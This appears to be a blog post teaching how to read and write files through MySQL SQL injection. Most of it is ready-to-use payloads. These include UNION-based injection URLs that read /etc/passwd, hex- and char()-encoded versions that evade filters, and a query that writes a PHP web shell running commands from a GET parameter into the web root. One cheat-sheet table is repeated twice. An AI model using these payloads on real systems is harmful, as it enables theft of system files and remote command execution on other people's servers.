READ ACCESS
It can be very useful to have read access to files on the compromised machine. It can lead to disclosure of information.
Firstly, MySQL has function that allows the reading of text or binary files on the underlying file system: LOAD_FILE(). Also, the session user must have FILE and CREATE TABLE privileges for the support table (only needed via batched queries). The file content can be retrieved via either UNION query, blind or error based SQL injection techniques.
However, there are some limitations:
- If the column datatype where the file content is appended is varchar, the maximum length of file characters displayed is 5000.
- The content is truncated to a few characters in many cases when it is retrieved via error based SQL injection technique.
- The file can be in binary format and, depending on the web application language, it cannot be displayed within the page content via UNION query or error based SQL injection technique.
http://site.com/sql.php?id=-1+union+select+1,load_file('/etc/passwd'),3,4,5,6,7
load_file(0x2f6574632f706173737764)
load_file(char(47,101,116,99,47,112,97,115,115,119,100))WRITE ACCESS
We saw about Read access. The file can be written via either UNION query or batched query SQL injection technique. Nevertheless, there are some limitations to be considered when using the UNION query technique:
- If the injection point is on a GET parameter, some web servers impose a limit on the length of the parameters' request
- It is not possible to append data to an existing file via INTO DUMPFILE clause.
These limitations can be bypassed:
- Encode the local file content to its corresponding hexadecimal string
- Split the hexadecimal encoded string into chunks 1024 characters long each
http://site.com/sql.php?id=-1+union+select+null,'normal text',null,null,null,null,null+into+outfile+'/tmp/everything'
http://site.com/sql.php?id=-1+union+select+null,<php or html code>,null,null,null,null,null+into+dumpfile+'/tmp/everything'
You can encrypte code html/php code or directory path to decimal.
char() or 0x... SITE
Description Query
Dump to file SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
Dump PHP Shell SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'
Read File SELECT LOAD_FILE('/etc/passwd')
Read File Obfuscated SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
reads c:\boot.ini
Description Query
Dump to file SELECT * FROM mytable INTO dumpfile '/tmp/somefile'
Dump PHP Shell SELECT 'system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'
Read File SELECT LOAD_FILE('/etc/passwd')
Read File Obfuscated SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
reads c:\boot.ini
Depending upon the configuration, it can be very complex to do and may require attention to the limits imposed by both the DBMS architecture and the web application.
I looked at the notes and wrote this article so I don't remember some references. I hope I wrote clearly. I hope I will write example with real website. If I made a mistake, forgive me and say me :D Good days.
https://sqlwiki.netspi.com/attackQueries/readingAndWritingFiles/#mysql
https://sqlwiki.netspi.com/attackQueries/readingAndWritingFiles/#mysql
No comments:
Post a Comment